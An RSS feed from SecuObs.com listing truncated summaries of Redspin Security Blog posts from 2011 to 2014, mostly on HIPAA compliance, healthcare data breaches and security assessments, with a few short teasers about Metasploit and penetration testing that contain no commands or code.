<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet Security Observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>Redspin Events in September</title><description>2014-08-30 01:26:41 - Redspin Security Blog : Redspin will be participating in several great healthcare and security conferences this September. Make sure you tune in to get useful information about IT security, policy compliance, and penetration testing. Stanford Medicine X, Palo Alto, CA: "Practical Information and Security Risk Management for ePatients" by Redspin VP Chris Campbell, September 6, 9:20am. HIMSS Privacy and Security Forum, Boston, MA: look for Redspin's co-exhibition with EMC, September 8-9. The Summit of the Southeast…</description><link>http://www.secuobs.com/revue/news/532250.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/532250.shtml</guid></item>
<item><title>OIG Finds NASA Web Application Security Lacking: Is it Time to Assess Yours?</title><description>Secuobs.com : 2014-07-26 14:58:29 - Redspin Security Blog - We may be able to send a man to the moon, but we still have a long way to go before all of our web applications are sufficiently protected from hackers.</description><link>http://www.secuobs.com/revue/news/527065.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/527065.shtml</guid></item>
<item><title>Why I Disagree With Google's Founders About the Healthcare Market</title><description>Secuobs.com : 2014-07-25 14:38:08 - Redspin Security Blog - Google's founders, Sergey Brin and Larry Page, were recently asked at a conference if they could imagine Google becoming a healthcare company. They both said "no" and explained their reasoning as follows. Brin felt the regulatory obstacles would "dissuade a lot of entrepreneurs" from entering the market and added "it's just a painful business to be in." Page gave an example of what he thought could be a useful medical research tool and said "that's almost impossible to do because of HIPAA." Well,…</description><link>http://www.secuobs.com/revue/news/526945.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/526945.shtml</guid></item>
<item><title>The Risks of a HIPAA Security Risk Analysis</title><description>Secuobs.com : 2014-07-09 00:32:16 - Redspin Security Blog - The risk of a HIPAA risk analysis is in not selecting the right team for the job.</description><link>http://www.secuobs.com/revue/news/524246.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/524246.shtml</guid></item>
<item><title>BYOD Security: The Next Problem, Data Sprawl</title><description>Secuobs.com : 2014-05-21 03:08:56 - Redspin Security Blog - Personally-Owned Devices and Data Sprawl. Mobile devices are designed to store less data than traditional laptops and desktop workstations. Cloud-based storage continues to enable a steady migration away from local device storage. Due to local storage limits, mobile users are increasingly turning to a wide array of cloud storage options to maintain and access their data. This is very helpful when a device is lost or stolen, but there are unintended consequences in complexity, security, and risk.…</description><link>http://www.secuobs.com/revue/news/514597.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/514597.shtml</guid></item>
<item><title>Largest HIPAA Compliance Settlement: A Prescription for IT Security Health</title><description>Secuobs.com : 2014-05-11 18:15:33 - Redspin Security Blog - The key to Redspin's rapid rise as the leader in HIPAA compliance for healthcare providers has been our unyielding focus on IT security. Last week's news that OCR had reached a 48 million settlement agreement with New York-Presbyterian Hospital and Columbia University Medical Center relating to HIPAA compliance violations further affirms our position. What started as an investigation of a 6,800 record ePHI breach became a multi-million dollar black eye for those providers. At the source…</description><link>http://www.secuobs.com/revue/news/512954.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/512954.shtml</guid></item>
<item><title>OpenSSL Vulnerability Discovered</title><description>Secuobs.com : 2014-04-08 21:06:55 - Redspin Security Blog - A two-year-old vulnerability in OpenSSL (the default cryptographic library used in many software applications, including web servers, operating systems, email, and instant-messaging clients) has been discovered. This vulnerability could make it possible for external parties to mine server memory for data including private encryption keys, passwords, and other credentials. If you are hosting a web server using a vulnerable version of OpenSSL (including most variants of Linux), it is recommended…</description><link>http://www.secuobs.com/revue/news/507099.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/507099.shtml</guid></item>
<item><title>Expect a HIPAA Security Audit, But Guess Who Will Conduct It?</title><description>Secuobs.com : 2014-03-25 18:53:45 - Redspin Security Blog - The 2009 HITECH Act deputized the Office of Civil Rights (OCR) to conduct HIPAA security audits under the auspices of the Department of Health and Human Services (HHS). But as it turns out, OCR is not the only HIPAA enforcer in town. State attorneys general can claim a similar right to audit; in fact, several were initially trained by OCR to do so. In the second half of 2013, the Center for Medicare Services (CMS) began conducting audits of eligible hospitals and providers that had received payments…</description><link>http://www.secuobs.com/revue/news/504753.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/504753.shtml</guid></item>
<item><title>Mobile Device Management: Protection But Not Panacea</title><description>Secuobs.com : 2014-03-11 22:58:45 - Redspin Security Blog - A Mobile Device Management (MDM) solution is a single security tool that must work in concert with many other IT operations to achieve information security. Choosing the right MDM requires significant forethought. Implementing all the controls correctly for all end-users requires cooperation with system owners. Maintaining secure configurations and accurate device information requires ongoing support. Choosing, implementing, and maintaining your MDM are each complex tasks with their own inherent…</description><link>http://www.secuobs.com/revue/news/502371.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/502371.shtml</guid></item>
<item><title>Why Risk an Incomplete HIPAA Risk Assessment?</title><description>Secuobs.com : 2014-02-27 23:07:37 - Redspin Security Blog - Covered entities and their business associates must conduct periodic HIPAA risk assessments (aka "HIPAA risk analysis") under the HIPAA Security Rule and Omnibus Final Rule. For eligible covered entities, a HIPAA risk assessment is also a core requirement of their Stage 1 and Stage 2 attestations for the EHR Meaningful Use Incentive Program. Both HHS' Office of Civil Rights (OCR) and Center for Medicare Services (CMS) have conducted hundreds of HIPAA audits over the past 18 months. OCR, the lead…</description><link>http://www.secuobs.com/revue/news/500344.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/500344.shtml</guid></item>
<item><title>The Biggest Oversight in HIPAA Security Risk Assessments: Security</title><description>Secuobs.com : 2014-01-23 20:16:28 - Redspin Security Blog - There are many HIPAA consultants, law firms, software companies, cloud service providers, and others who will happily provide you with a quote for a HIPAA security risk analysis. Neither the HIPAA Security Rule nor the respective references in Meaningful Use prescribe the exact form or format of a HIPAA Security Risk Analysis. So it is not surprising that so many enterprising professionals will offer their "version" of how a third-party firm can address this scope of work. What is surprising…</description><link>http://www.secuobs.com/revue/news/493667.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/493667.shtml</guid></item>
<item><title>Web Application Security Assessments: 2013 OWASP Top Ten</title><description>Secuobs.com : 2014-01-23 19:16:09 - Redspin Security Blog - The Open Web Application Security Project (OWASP) Top Ten project is an ongoing resource for application developers, IT professionals, and security experts, outlining and identifying some of the most critical risks facing organizations today. The 2013 release marks the tenth year of the OWASP Top Ten project. Here at Redspin, we utilize the OWASP Top Ten in our Application Security assessments, and members of our team have founded an OWASP chapter right here in Santa Barbara. We have introduced the…</description><link>http://www.secuobs.com/revue/news/493641.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/493641.shtml</guid></item>
<item><title>How Ethical Hacking Can Bolster Enterprise Security</title><description>Secuobs.com : 2014-01-14 19:20:23 - Redspin Security Blog - Ethical hacking sounds like an oxymoron. If you are someone who is responsible for the confidentiality, integrity, and availability of data on your network, isn't getting hacked the last thing you would want? Don't worry: ethical hacking projects (or assessments) don't involve doing any damage to your network. Sometimes, though, the best way to understand exactly how a real hacker would attack your assets is to simulate a real-world attack. Think of the pain that Target and its customers might…</description><link>http://www.secuobs.com/revue/news/491544.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/491544.shtml</guid></item>
<item><title>Healthcare IT Security Makes Strange Bedfellows</title><description>Secuobs.com : 2014-01-08 02:38:13 - Redspin Security Blog - Last week, it was reported that House Majority Leader Eric Cantor (Rep., VA) intends to draft legislation early in 2014 that would strengthen the IT security requirements of the Obama Administration in regard to the HealthCare.gov website. With more than 2 million Americans now enrolled in health plans through HealthCare.gov, Cantor believes that a stricter set of data security requirements should apply to the determination and reporting of any breach of personal information that occurs via the website. Currently,…</description><link>http://www.secuobs.com/revue/news/490295.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/490295.shtml</guid></item>
<item><title>HIPAA Security: Stage 2 Meaningful Use, Encryption, and Patient Portals</title><description>Secuobs.com : 2013-12-12 23:02:25 - Redspin Security Blog - A recent interview with Dan Berger, President and CEO, Redspin Inc. Q: You mention that there is "more focus on the EHR in stage 2." What kinds of things do you think CMS is really looking for? A: What I think has happened, in comparison to stage 1, where the onus was really basically on a provider using a certified EHR system in order to be even eligible for an incentive program, I think the onus has moved on to…</description><link>http://www.secuobs.com/revue/news/486007.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/486007.shtml</guid></item>
<item><title>60 Days After Discovery: HIPAA Incident Response and Breach Notification</title><description>Secuobs.com : 2013-10-31 00:27:41 - Redspin Security Blog - All organizations regulated by HIPAA must now document and report security incidents. The path from investigation to notification begins with discovery and initial investigation of the security incident, followed by a determination as to whether there was a security breach and a subsequent privacy breach, followed by breach notification. Most simply: first the security investigation, next the privacy investigation, and lastly breach notification. In a perfect world. There are many ways that a security or privacy incident can be discovered…</description><link>http://www.secuobs.com/revue/news/478104.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/478104.shtml</guid></item>
<item><title>OWASP Top 10 2013 Released</title><description>Secuobs.com : 2013-06-17 19:03:23 - Redspin Security Blog - The Open Web Application Security Project (OWASP) Top 10 project is an ongoing resource for application developers, IT professionals, and security experts, outlining and identifying some of the most critical risks facing organizations today. The 2013 release marks the tenth year of the OWASP Top 10 project. Here at Redspin, we utilize the OWASP Top 10 in our Application Security assessments, and members of our team have founded an OWASP chapter right here in Santa Barbara. We have introduced the…</description><link>http://www.secuobs.com/revue/news/451899.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/451899.shtml</guid></item>
<item><title>Healthcare IT Security: The "Not So Big Easy"</title><description>Secuobs.com : 2013-04-05 02:23:09 - Redspin Security Blog - HIMSS, the healthcare industry's standard bearer for the promotion of information technology (IT), held its 13th annual conference in New Orleans last month. Nearly 35,000 people attended the event, including former president Bill Clinton, fellow politicos James Carville and Karl Rove, and bow-tied Dr. Farzad Mostashari, HHS's National Coordinator for Health Information Technology. Interoperability and exchange were the hot topics of the week, further jazzed by the recently announced CommonWell Health Alliance, a 6-party partnership between Cerner, McKesson, Allscripts,…</description><link>http://www.secuobs.com/revue/news/437768.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/437768.shtml</guid></item>
<item><title>The Executive Order on Cybersecurity: What Does It Mean for Healthcare?</title><description>Secuobs.com : 2013-03-06 01:12:34 - Redspin Security Blog - The much anticipated executive order titled "Improving Critical Infrastructure Cybersecurity" was recently unveiled by the White House. As much praise as the President's order garnered, there are still many unknowns about how the order impacts not just healthcare but all major industries in the United States. In the era of HIPAA, HITECH, SOX and another dozen regulatory security compliance acronyms, how should the order be regarded? Potential, nothing more. To understand what the executive order means and doesn't mean, we…</description><link>http://www.secuobs.com/revue/news/431643.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/431643.shtml</guid></item>
<item><title>Did You Miss the HIPAA Omnibus?</title><description>Secuobs.com : 2013-02-04 18:14:08 - Redspin Security Blog - On January 17, 2013, the long-awaited HHS HIPAA Omnibus Rule was posted on the Federal Register and has been the subject of much fanfare in the press. According to HHS Secretary Kathleen Sebelius, "the new rule will help protect patient privacy and safeguard patients' health information in an ever-expanding digital age." Leon Rodriguez, Director of HHS' Office of Civil Rights (OCR), described the Omnibus rule-making as "the most sweeping changes to the HIPAA Privacy and Security Rules since they were…</description><link>http://www.secuobs.com/revue/news/425669.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/425669.shtml</guid></item>
<item><title>Small PHI Breaches, Big Problems</title><description>Secuobs.com : 2013-01-11 20:44:02 - Redspin Security Blog - Over the past year, Redspin (along with many others) has reported that breaches of protected health information (PHI) are at epidemic levels. We've all based this assertion on quantitative statistics. The Breach Notification Rule requires that healthcare providers report "large" PHI breaches (defined as those affecting 500 records) to HHS, which then publishes those details on its website, the so-called "Wall of Shame." Numerous presentations, news articles, blog posts, and tweets have reported on the most egregious offenses and the…</description><link>http://www.secuobs.com/revue/news/421296.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/421296.shtml</guid></item>
<item><title>The ROI of Business Associate Security Risk Management</title><description>Secuobs.com : 2012-11-28 19:14:40 - Redspin Security Blog - I recently presented the case for covered entities to be more proactive in regard to their business associates' IT security posture. The audience included over 50 healthcare CISOs. Most of them agreed that the risk of PHI breach among their business associates was "an unknown," or "very hard to measure," or even "likely to be very high." After my talk, one CISO said to me: "My organization has dozens of business associates. What is the ROI of conducting a risk…</description><link>http://www.secuobs.com/revue/news/413916.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/413916.shtml</guid></item>
<item><title>Why PHI Data Security is a Form of Asset Management</title><description>Secuobs.com : 2012-09-20 17:33:14 - Redspin Security Blog - Asset management is broadly defined as any system that monitors and maintains things of value to an entity or group. In regard to safeguarding the security of electronic health records, we often think of it as a custodial responsibility. Healthcare providers safeguard PHI primarily so that patient confidentiality is not breached. But in fact, that information is also an asset, something of great value to the provider. Three news items regarding recent healthcare data breaches make this abundantly clear.…</description><link>http://www.secuobs.com/revue/news/400828.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/400828.shtml</guid></item>
<item><title>Why Preparing for an OCR HIPAA Audit May Lead to a False Sense of Security</title><description>Secuobs.com : 2012-08-06 22:33:18 - Redspin Security Blog - Many healthcare organizations breathed a collective sigh of relief when the Office of Civil Rights (OCR) under the Department of Health and Human Services (HHS) finally made their HIPAA audit protocol publicly available this past June. It can be accessed here. As a refresher, Section 13411 of the 2009 HITECH Act required that HHS "provide for periodic audits to ensure that covered entities and business associates that are subject to the requirements of [HITECH and HIPAA] comply with such requirements." The…</description><link>http://www.secuobs.com/revue/news/392012.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/392012.shtml</guid></item>
<item><title>Official HIPAA Compliance Audit Protocol Published</title><description>Secuobs.com : 2012-07-03 01:49:12 - Redspin Security Blog - The Department of Health and Human Services' Office for Civil Rights (OCR) has finally published the official protocol and detailed procedures guiding their HIPAA Audit program. The protocol, developed by subcontractor KPMG together with OCR, includes 77 evaluation areas for security and another 88 areas for privacy breach notification. Here's a link to the publication, which is conveniently keyword searchable: http ocrnotificationshhsgov hipaahtml. Of particular interest to Redspin is the section dedicated to IT security. As former White House Cybersecurity Czar Howard Schmidt said recently, "Without…</description><link>http://www.secuobs.com/revue/news/385061.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/385061.shtml</guid></item>
<item><title>HIPAA Enforcement Heats Up in the Coldest State</title><description>Secuobs.com : 2012-06-27 23:01:01 - Redspin Security Blog - The Health and Human Services (HHS) Office of Civil Rights (OCR) has increased enforcement actions over the past several months, including reaching several breach resolution agreements with covered entities. OCR has also informed an additional 90 organizations of its intent to conduct HIPAA security audits before the end of the year. None of this is particularly surprising. For almost a year now, OCR has signaled that they intend to take their HIPAA enforcement responsibilities seriously, and there certainly have been…</description><link>http://www.secuobs.com/revue/news/384234.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/384234.shtml</guid></item>
<item><title>The First Step In Cyber Insurance: Know Your Risk And What You're Insuring Against</title><description>Secuobs.com : 2012-06-06 01:26:43 - Redspin Security Blog - Cyber insurance provides an opportunity to address residual risk in your information security program to offset the costs due to a data breach of ePHI. However, individual policies, coverage and exclusions are highly variable, so just like any security control, it's important to understand your security risk profile before an appropriate security insurance policy can be defined. An assessment, such as a HIPAA Security Risk Analysis, should be the first step in any insurance policy strategy. Here's why: You'll have…</description><link>http://www.secuobs.com/revue/news/379713.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/379713.shtml</guid></item>
<item><title>Redspin Provides Public Comments on Proposed Stage 2 Meaningful Use (NPRM)</title><description>Secuobs.com : 2012-05-08 00:49:52 - Redspin Security Blog - Redspin has provided security risk analysis (SRA) services to dozens of hospitals, helping them meet Core Measure 14 of the Stage 1 Meaningful Use EHR Incentive Program. As one of the leading experts in IT security, we take a comprehensive approach to these engagements. As such, our primary focus is to help our clients truly safeguard PHI from data breach by expanding beyond a strict interpretation of the Stage 1 Rule. It is from that vantage point that we are…</description><link>http://www.secuobs.com/revue/news/374191.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/374191.shtml</guid></item>
<item><title>Stage 2 Meaningful Use: The Next Step in Security Risk Analysis</title><description>Secuobs.com : 2012-05-02 18:53:10 - Redspin Security Blog - At first read, the security risk analysis (SRA) provisions of the proposed Stage 2 "meaningful use" regulations appear to have changed only slightly from those in Stage 1. The language in the draft rule is nearly identical to Stage 1, with one notable addition highlighted below: "Conduct or review a security risk analysis in accordance with the requirements under 45 CFR 164.308(a)(1), including addressing the encryption/security of data at rest in accordance with requirements under 45 CFR 164.312(a)(2)(iv) and 45 CFR 164.306(d)(3),…</description><link>http://www.secuobs.com/revue/news/373186.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/373186.shtml</guid></item>
<item><title>A Blue Note: Looking Deeper at the 2009 PHI Breach at BlueCross BlueShield Tennessee</title><description>Secuobs.com : 2012-03-18 03:35:13 - Redspin Security Blog - The cost of a significant data breach of protected health information (PHI) has been a popular topic in the news recently. The new ANSI publication "The Financial Impact of Breached Protected Health Information: A Business Case for Enhanced PHI Security" debuted with much fanfare in DC earlier this month. White House Cybersecurity Czar Howard Schultz kicked off a March 5th press conference where the release of the report was announced. His participation helped elevate the issue to a national audience.…</description><link>http://www.secuobs.com/revue/news/364323.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/364323.shtml</guid></item>
<item><title>The Financial Impact of Breached Protected Health Information: A Business Case for Enhanced PHI Security</title><description>Secuobs.com : 2012-03-08 22:15:04 - Redspin Security Blog - On Monday, March 5th, I was invited to a press conference in Washington, DC announcing the release of "The Financial Impact of Breached Protected Health Information: A Business Case for Enhanced PHI Security," published by the American National Standards Institute (ANSI). The honorable Howard A. Schmidt, White House Cybersecurity Czar, kicked off the event. Mr. Schmidt commented that "in the continuum of the cybersecurity issues we look at, [healthcare security] is obviously critical as this is one that affects…</description><link>http://www.secuobs.com/revue/news/362345.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/362345.shtml</guid></item>
<item><title>Stage 2 Meaningful Use: Addressing Encryption Security</title><description>Secuobs.com : 2012-02-26 05:00:01 - Redspin Security Blog - Last week, Health and Human Services Secretary Kathleen Sebelius reported that the number of hospitals using electronic health records (EHR) has more than doubled in the last two years, from 16 to 35 percent. She also said that 85 percent of all hospitals now report that by 2015 they intend to participate in The Centers for Medicare and Medicaid Services' (CMS) EHR incentive program. Also last week, CMS released the proposed Stage 2 Meaningful Use requirements for public comment. The…</description><link>http://www.secuobs.com/revue/news/359943.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/359943.shtml</guid></item>
<item><title>Stage 2 Meaningful Use Debuts in Las Vegas (Finally)</title><description>Secuobs.com : 2012-02-24 15:04:15 - Redspin Security Blog - I wasn't the most popular person around the office printer late yesterday afternoon. It was right after HHS and CMS finally released the proposed rule for Stage 2 of the EHR Meaningful Use Incentive Program. Earlier in the week, rumors regarding the release of the 445-page document swirled around the HIMSS12 Conference. Perhaps because it was in Las Vegas, Stage 2 seemed to take on its own celebrity status. HIMSS participants arrived early for the 8:30AM "Achieving Meaningful Use Symposium"…</description><link>http://www.secuobs.com/revue/news/359721.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/359721.shtml</guid></item>
<item><title>HIPAA Security Risk Analysis: Are You One Of The 3,300?</title><description>Secuobs.com : 2012-01-25 21:03:41 - Redspin Security Blog - Get 'er Done! I'm referring of course to the HIPAA Security Risk Analysis requirement of the Stage 1 EHR Meaningful Use Incentive Plan. Between 85%-90% of the 5,000 eligible hospitals say they plan to qualify for Stage 1, yet data from the Centers for Medicare &amp; Medicaid Services shows less than 25% have attested and received payment as of November 30, 2011. So for the 3,300 or so other hospitals, this is no time to procrastinate. Time flies, whether you're having fun or…</description><link>http://www.secuobs.com/revue/news/354115.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/354115.shtml</guid></item>
<item><title>How An Internal Penetration Test Can Help Your Organization</title><description>Secuobs.com : 2011-12-22 19:08:23 - Redspin Security Blog - Every IT department faces the challenge of having to apply limited resources (headcount, technology, 3rd party assessments) against a plethora of potential security risks. Choosing wisely is often the difference between an effective security strategy and an ineffective one. With that in mind, and a number of possible assessment approaches available, what benefits can be gained from an internal penetration test? First, since security terminology is often misunderstood, let's define internal penetration testing. An internal pen test is a…</description><link>http://www.secuobs.com/revue/news/348648.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/348648.shtml</guid></item>
<item><title>"Enforcement Promotes Compliance": HIPAA Audits Just Around the Corner</title><description>Secuobs.com : 2011-11-23 03:18:57 - Redspin Security Blog - Earlier this month, the US Department of Health and Human Services (HHS) Office for Civil Rights (OCR) released further details on its plan to audit 150 covered entities under its pilot HIPAA audit program. Periodic audits of the HIPAA privacy, security and breach notification standards are required of the HHS Secretary under Section 13411 of the HITECH Act (2009). In June of 2011, OCR awarded a 92 million contract to the consulting firm KPMG to develop an audit methodology…</description><link>http://www.secuobs.com/revue/news/342138.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/342138.shtml</guid></item>
<item><title>Healthcare IT Security: Who's Responsible, Really?</title><description>Secuobs.com : 2011-11-15 17:17:05 - Redspin Security Blog - In any complex, cross-functional business challenge, responsibility and authority must be distributed intelligently while at the same time providing a process of internal dispute resolution. An information security program is one such complex and multifarious business necessity. At its heart, information security is a method of managing risk to information and information systems, and reducing uncertainty relative to organizational objectives; it is a balance. But the success of an information security program depends upon the ability of an organization to…</description><link>http://www.secuobs.com/revue/news/340776.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/340776.shtml</guid></item>
<item><title>The "Yelp for Security Tools": SecTools.Org 2011 Update</title><description>Secuobs.com : 2011-11-05 02:36:32 - Redspin Security Blog - Gordon Lyon, better known by his online alias of Fyodor and as the creator of the very popular (and awesome) tool Nmap, has released the results of the Nmap 2010 User Survey, which he performs every couple of years. The survey is filled out by members of the Nmap-Hackers mailing list, one of several mailing lists that Fyodor maintains, which is made up of many smart minds in the security world. The 2010 survey had more than 3000 participants throw…</description><link>http://www.secuobs.com/revue/news/338988.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/338988.shtml</guid></item>
<item><title>Wireless security controls are often too lax for the data they need to protect</title><description>Secuobs.com : 2011-10-06 20:11:25 - Redspin Security Blog - At Redspin we are often asked to perform wireless security assessments for organizations that have recently deployed or upgraded their wireless infrastructure with top-of-the-line access points (APs), controllers and wireless intrusion detection systems (WIDS). Many deployments are to support inter-office mobility, a need that has gone from a rising tide to a tsunami in…</description><link>http://www.secuobs.com/revue/news/333153.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/333153.shtml</guid></item>
<item><title>Healthcare Data Breaches: Insider Job, Cybercrime, or Both?</title><description>Secuobs.com : 2011-10-04 02:38:43 - Redspin Security Blog - As required by section 13402(e)(4) of the HITECH Act, the HHS Secretary must post a list of breaches of protected health information (PHI) impacting 500 or more individuals. In the past 2 years, over 118 million Americans have been affected in nearly 330 separate incidents. This information is contained in a publicly searchable and downloadable…</description><link>http://www.secuobs.com/revue/news/332437.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/332437.shtml</guid></item>
<item><title>Happy Birthday, Healthcare Breach Notification Rule</title><description>Secuobs.com : 2011-09-25 14:33:15 - Redspin Security Blog - I wasn't the only one celebrating a birthday last week. It's been exactly two years since the breach notification rule, mandated by the HITECH Act, took effect. Since then, 330 major health information breaches affecting 11.8 million individuals have been reported to the Department of Health and Human Services' Office for Civil Rights (OCR). And ...</description><link>http://www.secuobs.com/revue/news/330939.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/330939.shtml</guid></item>
<item><title>Importing and Working with Nmap Scans in Metasploit Framework 4</title><description>Secuobs.com : 2011-09-14 20:24:21 - Redspin Security Blog - Importing Nmap scans directly into Metasploit is one of the best time-saving tricks you can accomplish while using the Metasploit Framework. Once the full Nmap data is happily in your PostgreSQL database and accessible to Metasploit, you can do all kinds of cool things with it that will save you lots of time and frustration ...</description><link>http://www.secuobs.com/revue/news/328880.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/328880.shtml</guid></item>
<item><title>Viewing GPOs on the Commandline</title><description>Secuobs.com : 2011-09-02 19:18:30 - Redspin Security Blog - Want a quick way to see what GPOs are applied to your local system, just using built-in utilities? Using the GUI to manually view what settings are applied is awkward and slow. Use the following commands to see what policies are being handed down to the system you're on and what they're enforcing. This ...</description><link>http://www.secuobs.com/revue/news/326757.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/326757.shtml</guid></item>
<item><title>New Windows Worm Squirming Through RDP</title><description>Secuobs.com : 2011-08-28 23:57:45 - Redspin Security Blog - I haven't seen a Windows worm in the wild in a long time. The last time a major worm infestation took place was in 2003, in the days of Blaster, which spread via an unpatched flaw in RPC. That same year was Slammer, and Code Red a few years before in 2001. This new worm ...</description><link>http://www.secuobs.com/revue/news/325670.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/325670.shtml</guid></item>
<item><title>Installing Metasploit 4 in Ubuntu 11.04</title><description>Secuobs.com : 2011-08-19 17:40:42 - Redspin Security Blog - Install the latest version of the Metasploit 4 Framework (MSF4) on Ubuntu 11.04 Natty Narwhal using the following commands. This downloads and installs the generic Linux binary, which comes bundled with all the necessary components you need for Metasploit to install and run. This should work for most users and is the easiest way to ...</description><link>http://www.secuobs.com/revue/news/324090.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/324090.shtml</guid></item>
<item><title>Testing Windows Passwords with Metasploit</title><description>Secuobs.com : 2011-08-18 00:50:12 - Redspin Security Blog - An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we'll take the same tactic as well. Frequently this is accomplished by guessing a password to a user's account and then either using the privileges of that account to gain access to ...</description><link>http://www.secuobs.com/revue/news/323755.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/323755.shtml</guid></item>
<item><title>HIPAA Audits: Paying a Little Attention Now Will Pay Big Benefits Later</title><description>Secuobs.com : 2011-08-04 08:30:25 - Redspin Security Blog - In July, the HHS Office of Civil Rights (OCR) announced that they had appointed consulting firm KPMG to conduct up to 150 HIPAA audits of covered entities and business associates by the end of 2012. The implementation of the audit program fulfills a compliance enforcement mandate of the 2009 HITECH Act. The KPMG contract enables ...</description><link>http://www.secuobs.com/revue/news/320987.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/320987.shtml</guid></item>
<item><title>Metasploit 4.0 Highlights</title><description>Secuobs.com : 2011-07-29 18:50:46 - Redspin Security Blog - Earlier this week HD Moore gave a live webcast demoing the new, highly anticipated Metasploit 4 release. The live demo went as smoothly as a live demo can go, and as always HD Moore is great to hear talk no matter what the topic is. This presentation was particularly excellent because he's so passionate about ...</description><link>http://www.secuobs.com/revue/news/320000.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/320000.shtml</guid></item>
<item><title>Apple Releases Lion into the Wild</title><description>Secuobs.com : 2011-07-21 09:48:57 - Redspin Security Blog - Today Apple released OS X 10.7 Lion, the latest version of their desktop and server OS. A number of new security features have been introduced with Lion, which are very welcome, as well as a bunch of new usability tweaks and other generally cool things. I upgraded my i7 MacBook Pro to it a few hours ago ...</description><link>http://www.secuobs.com/revue/news/318388.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/318388.shtml</guid></item>
<item><title>Improving Authentication for Online Services</title><description>Secuobs.com : 2011-07-10 16:12:19 - Redspin Security Blog - The FFIEC (Federal Financial Institutions Examination Council), the banking interagency body that creates unified standards across the various regulatory agencies, recently issued new guidance on managing risks in user authentication for online transactions. The guidance is practical and has relevance for any industry in which sensitive transactions are conducted online. Categorically this applies to banks ...</description><link>http://www.secuobs.com/revue/news/316133.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/316133.shtml</guid></item>
<item><title>Redspin's Declaration of Network Security Independence</title><description>Secuobs.com : 2011-07-04 20:28:11 - Redspin Security Blog - We hold these truths to be self-evident, that all networks are created for a higher purpose, that they are intended to support communication, productivity, and prosperity, and are endowed by their architects and administrators with certain unalienable Rights, that among these are Security, Confidentiality, and Integrity. That to secure these systems, expertise arises among certain ...</description><link>http://www.secuobs.com/revue/news/315098.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/315098.shtml</guid></item>
<item><title>Preventing a Healthcare Data Breach Epidemic</title><description>Secuobs.com : 2011-07-01 22:53:39 - Redspin Security Blog - Certain types of computer dysfunction are analogous to disease, at least in a descriptive sense. For example, we say that a PC can get "infected" by a computer "virus". The recent rash of hacker attacks makes me wonder if we're on the verge of a data breach "epidemic". True epidemics occur when new human cases ...</description><link>http://www.secuobs.com/revue/news/314835.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/314835.shtml</guid></item>
<item><title>The CWE/SANS Top 25 Most Dangerous Software Errors announced, along with a new set of standards</title><description>Secuobs.com : 2011-06-28 19:48:32 - Redspin Security Blog - In a new and revised format, SANS along with MITRE have published the latest list of the highest risk software security vulnerabilities; the revision to the list is based on the CWE, CWSS and CWRAF security standards. The announcement leverages and highlights these new standards and collaboration efforts among the security community, including corporate, non-profit ...</description><link>http://www.secuobs.com/revue/news/314061.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/314061.shtml</guid></item>
